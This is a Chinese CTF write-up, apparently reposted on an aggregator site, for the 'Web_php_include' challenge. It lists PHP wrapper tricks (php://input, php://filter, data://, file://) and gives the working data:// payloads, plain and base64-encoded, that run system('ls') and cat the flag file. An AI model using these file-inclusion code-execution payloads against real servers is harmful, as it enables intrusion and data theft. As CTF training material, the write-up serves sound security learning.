首页 > 编程语言 >Web_php_include

Web_php_include

时间:2023-11-07 11:57:23浏览次数:124  
标签:Web include text base64 plain php data

常用伪协议用法:
1. php伪协议
用法:(大小写都可以)
php://input,用于执行php代码,需要post请求提交数据。
php://filter,用于读取源码,get提交参数。?a=php://filter/read=convert.base64/resource=xxx.php
需要开启allow_url_fopen:php://input、php://stdin、php://memory、php://temp
不需要开启allow_url_fopen:php://filter

2. data协议

用法:
data://text/plain,xxxx(要执行的php代码)
data://text/plain;base64,xxxx(base64编码后的数据)
例:
?page=data://text/plain,
?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCJscyIpPz4=

3. file协议
用法:
file://[本地文件系统的绝对路径]

 

这里我用的payload是:

?page=data://text/plain,<?php system("ls")?>
?page=data://text/plain,<?php system("cat fl4gisisish3r3.php")?>

 

 这时候要查看源代码才能看到flag

 

 参考文章:

攻防世界-Web_php_include详解_攻防世界 web_php_include-CSDN博客

 

标签:Web,include,text,base64,plain,php,data
From: https://www.cnblogs.com/lhqrusht0p/p/17814687.html

相关文章

  • 开源组态软件有哪些?国产常用 Web 组态软件
    组态软件最早出现在80年代初,那时是基于DOS系统开发的,当时的主要产品是Onspec、Paragon等;进入90年代,主要是基于WINDOWS系统的组态软件,如Intouch、Kingview、Ifix等;随着物联网、大数据等技术的高速发展,当下最热的组态软件大都基于H5的Web组态软件。非开源组态软件Sovit2DSovit......
  • webrtc 低通滤波器
     #include"low_pass_filter.h"  doubleprev_output=0.0;doubleprev_input=0.0;  //去噪 WebRtcNsx_Process(webrtc_nsx,&g_aecmAudio,1,&g_ns); if(WebRtcAgc_Process(webrtc_agc,&g_ns,1,160,&pBuff,in_mic_......
  • web.xml 4.0版本
    现在通过idea创建javaee项目都是走的Jakarta,web.xml默认5.0版本起,但有的时候还是会用到4.0版本,这里给自己留个记录<?xmlversion="1.0"encoding="UTF-8"?><web-appxmlns="http://xmlns.jcp.org/xml/ns/javaee"xmlns:xsi="http://www.w3.org/......
  • FastAPI搭建Web服务器
    FastAPI搭建Web服务器1、基于FastAPI之web站点开发#第一步:导入模块fromfastapiimportFastAPI#导入响应报文Response模块fromfastapiimportResponse#导入服务器uvicorn模块importuvicorn#第二步:创建FastAPI对象app=FastAPI()#第三步:通过@app路由装饰器收......
  • javaweb-- Mybatis参数传递
     Mybatis提供了ParamNameResolver类进行封装 传入多个参数时,mybatis会将参数封装成Map集合map.put("arg0",参数值1)map.put("param1",参数值1)map.put("arg1",参数值2)map.put("param2",参数值2) ......
  • websec / passwd dict / passwd dict / pwd dict / mima
    s 序号项目描述备注11400多万个弱口令密码字典下载https://www.perfcode.com/p/password-dictionary.html该密码字典包含1400多万个密码,包含弱密码、常用密码、短密码等组合,适合暴力猜解使用;该文件来源于Kali系统下的密码字典文件;如果你使用Kali系统,该密码字典......
  • JavaScript--Web API
    DOMDOM(DocumentObjectModel——文档对象模型)是用来呈现以及与任意HTML或XML文档交互的API。DOM是浏览器提供的一套专门用于操作网页内容的功能作用:开发网页内容特效和实现用户交互DOM树DOM节点节点是文档树的组成部分,每一个节点都是一个DOM对象,主要分为......
  • javaWeb&springMVC
    Servlet1:servlet定义servlet是开发动态web的一门技术,通过servlet实现与用户的动态交互。2:使用方式(1)javaWeb中只需要继承HttpServlet接口,重写其中的doGet和doPost方法即可编写一个servlet;写好servlet程序后需要在web.xml文件中编写映射,相当于将我们缩写的servlet注册到web服务......
  • php 点击下载文件
    //下载文件publicfunctiondownload(Request$request){$file_path='C:/Users/Admin/Desktop/办公材料/缓存.txt';$file_name='缓存.txt';if(!file_exists($file_path)){echo'文件不存在';exit();}header('Con......
  • 记一次对某变异webshell的分析
    0x01前言在某活动中捕获到一个变异的webshell(jsp文件格式),如图1.1所示。样本webshell的大致功能是通过加载字节码来执行恶意代码,整个webshell的核心部分逻辑是在字节码中。样本文件下载链接:https://github.com/webraybtl/webshell1图1.1变异webshell样本直接通过冰蝎、哥斯拉、天......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99